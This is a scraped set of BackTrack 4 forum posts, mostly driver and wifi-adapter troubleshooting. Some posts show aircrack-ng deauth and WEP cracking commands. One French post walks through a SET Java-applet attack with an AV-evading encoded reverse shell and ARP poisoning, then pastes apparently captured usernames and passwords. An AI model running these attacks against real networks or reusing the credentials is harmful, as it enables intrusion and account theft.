I'm a newbie to the forums (fantastic forum by the way) and I'm having trouble with the ALFA AWUS036H 1000mw version (RTL8187L) picking up the WPA 4 way handshake. I've trawled the forum and google to no avail.
I've done the usual:
Airmon-ng start wlan0
Airodump start mon0
Select another computer on my home network and Deauth. I can see the Deauth'ing taking place in Airodump on the selected target and also succesfully running in Aireplay. I have also run the test in Aireplay just to make double sure (Injection Working).
I'm at a dead end on this and don't know if I've missed something really trivial or this is bigger problem - I've seen alot of posts mentioning trouble picking up the 4 way handshake and I just can't seem to get it working. :confused:
Any advice or help would be greatly appreciated :)
-
1:39
»
remote-exploit & backtrack
Bonjour, j'ai fait des recherches sur le net et les anciens comme le nouveau forum, je vois que personne ne s'est plain de l'utilisation des ressources par backtrack 4, moi j'ai mon microprocesseur duo-core qui est a 50% pour chaques processeurs et de ce faite le ventilateur tourne à plein régime durant tout le temps d'utilisation de l'os.
Je n'ai aucun problème de ce genre avec Windows 7 (oui je suis en dual boot). Cooment puis-je faire pour configurer les ressources mais aussi l'utilisation de la batterie sous backtrack 4. J'ai chercher du coté du KDE mais je le trouve trop opaque et pas configurable à souhait.
Merci de votre aide.
-
1:23
»
remote-exploit & backtrack
About every 3 minutes my internet just stops working.. (bcom 4318 + ndiswrapper = gooogle party all night long) .. and i might have over looked this on google but.. if I don't reissue the command "dhclient" about every 3 minutes my internet stops working.. has anyone else had this issue? OS is backtrack 4 final release.. no modifications to anything yet
-
-
17:58
»
remote-exploit & backtrack
Bonjour tout le monde, je souhaiterai savoir si l'un d'entre vous serez faire fonctionner une carte wifi, mini PCI avec chipset atheros "ar2427". Actuellement je tourne avec une alfa awus03....mais je suis désireux de faire fonctionner celle native de mon eeepc 900 HA avant de devoir la remplacer et pour ce faire peter la garantie. Elle nest strictement pas reconnue avec les commandes iwconfig, ifconfig et autre modprobe ...
Dans l'attente d'une réponse ou conseil, je vous salut ;)
-
10:30
»
remote-exploit & backtrack
Hey Dudes,
I've got a problem and I hope that someone can help me.
I want to test my network..
Thus I want to do with the interactive packet replay attack.
At first the basics:
I am using BackTrack 4, with a Intel 3945 ABG chipset, yeah I do know its not the best one..
I did the injection test with a positive result.
In the network there is no client.
I already started capturing the ivs.
I do want to cause some traffik with the aireplay-ng -2 -p 0841 attack.
My problem:
At first I make the fake authentication with this command:
Quote:
aireplay-ng -1 0 -a 00:23:08:81:2A:25 -h 00:1C:BF:69:AA:83 wlan0
|
-a is the ap's mac und -h is my chipset's one
It responds:
Quote:
18:06:11 Waiting for beacon frame (BSSID: 00:23:08:81:2A:25) on channel 5
18:06:11 Sending Authentication Request (Open System) [ACK]
18:06:11 Authentication successful
18:06:11 Sending Association Request [ACK]
18:06:11 Association successful :-) (AID: 1)
|
So far, this seems to be sucessful, now I'm trying to do the replay with this command:
Quote:
aireplay-ng -2 -p 0841 -b 00:23:08:81:2A:25 -h 00:1C:BF:69:AA:83 -c FF:FF:FF:FF:FF:FF wlan0
|
again, -b is the ap's mac and -h my chipset's one..
Well, there isn't a real respond... it just count some packets:
Quote:
Nothing more happens..
Have you got a solution for me ?
Thx for reading,
TrackLine
-
8:44
»
remote-exploit & backtrack
I am deciding on which wifi card I should get. Either the 500mw or the 1000mw alpa networking booster card. Anyone here tried either cards. I search the forum and saw that some people were using the 500mw but want I to know if anyone has experienced better performance with the 1000mw or even the 2000mw adapter card?
Thanks
1. 500mw amazon.com/Adapter-Wardriving-Extension-Strongest-Market/dp/B000QYGNKQ/ref=dp_cp_ob_e_title_3?ie=UTF8&qid=1264171727&sr=8-1]Amazon.com:[/url] USB 500mW WiFI Adapter for Wardriving & Range Extension *Strongest on the Market*: Electronics
2. 1000mv amazon.com/Wireless-Original-Alfa-9dBi-Strongest/dp/B001O9X9EU/ref=sr_1_1?ie=UTF8&s=electronics&qid=1264434130&sr =1-1-spell]Amazon.com:[/url] 1000mW 1W 802.11b/g USB Wireless WiFi Network Adapter With Original Alfa Screw-On Swivel 9dBi Rubber Antenna *Strongest on the Market*: Electronics
-
7:37
»
remote-exploit & backtrack
hep tous,
je cherche un dico pour cracker du wpa, pourriez-vous me dire si un dico avec chiffres et lettres est suffisant? avez-vous un lien?
merci
-
-
16:53
»
remote-exploit & backtrack
I have a Lenovo G550 laptop in which I just recently installed BT4. None of my networking works at all (the network interface only shows a local loopback). I had Ubuntu on here before to try that package it worked but too clutery. On the 9.10 in cd/pools/restricted/b/bcm that package does make it so I can have wireless. I tried to install that and that was a no go also. So I come broken and needing help.
|Tags: broadcom,4312,BCM43,14e4:4315,rev 01|
-
11:27
»
remote-exploit & backtrack
Hi
I've only been using BT4 for a few days. I've managed to crack a few WEP keys and Ive managed to read around most subjects but I'm struggling with one aspect.
I'm using the simple WEP crack tut from aircrack-ng site
I dont have problem injecting the packets the problem seems to be capturing them then cracking them
OK the command I use is
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output wlan0
I sometimes get this output
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy
BSSID STATION pew lost pac's
00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
I dont have a problem when there is one station the problem's I have is when more than one station is attached to the BSSID. Sometimes six. I can inject packets to one station but not them all. Although I can see the packets on that station being injected above the station list the total does not climb.
Hoping someone can understand what I mean
Thanks in advance
-
10:33
»
remote-exploit & backtrack
Tach jungs,
ich hätte da ein Problem ich bin gester extra losgezogen und hab mir einen D-Link DWL-G122 gekauft da der laut
Code:
backtrack.offensive-security.com/index.php?title=HCL:Wireless#Asus_WL-138g_v2
(ich darf noch keine URL`s Posten deswegen ohne www)
erkannt wird.
Naja leider ist genau dass das problem: "No Wireless Adapter found" oder so ähnlich habs nicht ganz im Kopf.
Was soll ich den jetzt machen? Ihr seit doch hier die "Cracks" :D (hoffe ich mal:cool::cool:)
Schonmal vielen dank für die hilfe
Nawuko
EDIT: Mir ist Grad was aufgefallen auf der seite steht D-Link DWL G122 (USB) F/W 2.03 B1 bei mir auf dem stick F/W 3.30 und H/W C1..
Umsonst gekauft ?
-
7:02
»
remote-exploit & backtrack
Bonjour ,voila j'ai installer backtrack 4 sur Mon pc portable ,mai il ne reconnait pas ma carte wifi Atheros AR5B91 et je n'arrive pas a trouver sur internet les drivers pour utiliser ma carte wifi ,j'aimerai savoir commant faire pour trouver ces divers et comment les installer, mercis
-
5:55
»
remote-exploit & backtrack
Ist das ein gutes Angebot?
hxxp://cgi.ebay.de/ALFA-NETWORK-AWUS036H-1000mW-WLAN-USB-5dBi-antenna_W0QQitemZ250559645826QQcmdZViewItemQQptZDE _Computer_Peripherie_Netzwerk?hash=item3a5684c882
-
4:03
»
remote-exploit & backtrack
MERCI AUX MODOS DE SUPPRIMER CE POST cause : DOUBLE POST
Bonjour à tous et bravo pour ce forum que je lis depuis qlqs semaines déjà;
j'ai un dell vostro 1520 et une cle Alfa AWUS036EH RTL8187L. Avec BT4 avec un clé wifi AWUS036EH RTL8187L en VMware (image telecharger sur le site officiel)
BT4 se lance bien en revanche ne detecte pas ma cle Alpha. je lance les commandes suivante :
root@bt:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
root@bt:~# lsusb
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
root@bt:~# airmon-ng
Interface Chipset Driver
bon rien...; je telecharger et j'install un driver et le patch, ca ne marche pas, j'en install un autre (telecharger sur un tuto d'air crack) la commande make passe bien donc pour moi le drivers est installé mais toujours rien dans iwcondif et airmon
voila, donc la je suis un peu perdu, je pense que le controleur usb n'est peut etre pas reconnu.....?
auriez vous une piste svp !!! :)
merci d'avance et bon dimanche !
-
4:03
»
remote-exploit & backtrack
MERCI AUX MODOS DE SUPPRIMER CE POST cause : DOUBLE POST
Bonjour à tous et bravo pour ce forum que je lis depuis qlqs semaines déjà;
j'ai un dell vostro 1520 et une cle Alfa AWUS036EH RTL8187L. Avec BT4 avec un clé wifi AWUS036EH RTL8187L en VMware (image telecharger sur le site officiel)
BT4 se lance bien en revanche ne detecte pas ma cle Alpha. je lance les commandes suivante :
root@bt:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
root@bt:~# lsusb
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
root@bt:~# airmon-ng
Interface Chipset Driver
bon rien...; je telecharger et j'install un driver et le patch, ca ne marche pas, j'en install un autre (telecharger sur un tuto d'air crack) la commande make passe bien donc pour moi le drivers est installé mais toujours rien dans iwcondif et airmon
voila, donc la je suis un peu perdu, je pense que le controleur usb n'est peut etre pas reconnu.....?
auriez vous une piste svp !!! :)
merci d'avance et bon dimanche !
-
-
12:09
»
remote-exploit & backtrack
Bonsoir
Je dispose d'un ALFA NETWORK AWUS050nh Carte USB Wifi 500mW je voudrais savoir comment il faut faire pour pouvoir l'utilise avec BT4 car quand je le branche en USB la petite diode verte ne s'allume pas. Alors que sous windows elle fonctionne, aidez moi SVP
merci d'avance.
-
9:41
»
remote-exploit & backtrack
Hi,
I have several questions regarding backtrack, I did do research but so far it hasn't helped, also searched related problems etc.
I'm using backtrack 4 beta -> the live cd
first of all, I can't connect to a network..
I first tried using
Code:
/etc/init.d/NetworkManager start
And then just add a connection to my wlan0 (my router, a linksys)
I choose WPA, and gave in my key
but when it connects, the state just goes to 'configuring' and after a while it goes to disconnected..
I also tried it with a WEP key, same effect..
I just tried a different method
Code:
ifconfig wlan0 down
iwconfig wlan0 essid linksys key "s:<thekey>"
ifconfig wlan0 up
(I was under the impression that this was the way to do it?
So that's my first problem, I don't know how to connect to a wireless network..
Second problem is, I bought an MSI star key 2.0 but when I use the bluescanner, it can't detect anything, I think it's because it doesn't detect the device? (Is this normal? Or should I install a driver for it? )
Kind regards
-
2:29
»
remote-exploit & backtrack
salut voila en utilsant set toolkit je ne comprend pas pourquoi il me donne des adresse mail russe espagnole avec leur code je lutilise sur backtrack 4
en fesant cette exemple
1. Automatic E-Mail Attacks (UPDATED)
2. Website Java Applet Attack (UPDATED)
3. Update Metasploit
4. Update SET
5. Create a Payload and Listener
6. Help
7. Exit the Toolkit
Enter your choice: 2 ok
°°°°°°°°°°et
Website Attack Vectors
1. Let SET create a website for you
2. Clone and setup a fake website (NEW)
3. Import your own website (NEW)
4. Return to main menu.
Enter number: 1 ok
°°°°°°°°°°et
What payload do you want to generate:
Name: Description:
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8. Import your own executable Specify a path for your own executable
Enter choice (example 1-4): 1 7 ok
°°°°°°°°°°et
Select one of the below, Shikata_Ga_Nai is typically the best.
1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding
Enter your choice (enter for default): 2 ok
°°°°°°°°°°et
Usually 1 to 4 does the trick, if you get an
error messsage, some encoders don't like
more than one. Specify 0 if you want.
How many times do you want to encode the payload: 1 ok
°°°°°°°°°°et
Enter the PORT of the listener: 443 ok
and
Enter the PORT of the listener: 443
[-] Encoding the payload 1 times to get around pesky Anti-Virus. [-]
[*] x86/shikata_ga_nai succeeded with size 46 (iteration=1)
[*] ARP Cache Poisoning is set to ON.
What IP Address do you want to poison: 192.168.1.21 ok
and
Filter created...
Compiling Ettercap filter...
etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file 'src/program_junk/ettercap.filter' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'src/program_junk/ettercap.ef' done.
-> Script encoded into 16 instructions.
Filter compiled...Running Ettercap and poisoning target...ok
voila donc apres sa je lance ettercap-gtk en visant le pc sur mon reseau et voici se que j obtient je ne comprend pas car l attack que j utilise n ai pas faite pour sa ! je cherche des explication sur se soft mais je trouve toujours la meme video sur le net ne parlant pas trop bien anglais je ne peut pas contacter
kennedyD013@gmail.com
HTTP : 116.122.36.184:80 -> USER:
pwoyaeu@hct.w.com PASS: RAND#a#8 INFO:
PHP¿Í MySQLÀ» Ȱ¿ëÇÑ °Ô½ÃÆÇ
HTTP : 217.69.130.41:80 -> USER: alijahhali096 PASS: Pob7Qrm2Kl INFO: my.mail.ru/cgi-bin/auth
c est quoi le soucie ??????????????????????????????,
-
-
15:32
»
remote-exploit & backtrack
Hello there .
when I want to start graphical mode i got out of range error in my monitor, I hadn't such a problem with my previous linux dsitributions such as debian or suse.
Is there any switch available for startX for solving this kind of problem or the problem is not there ?
any suggestion are welcome .
thanks .
- Genius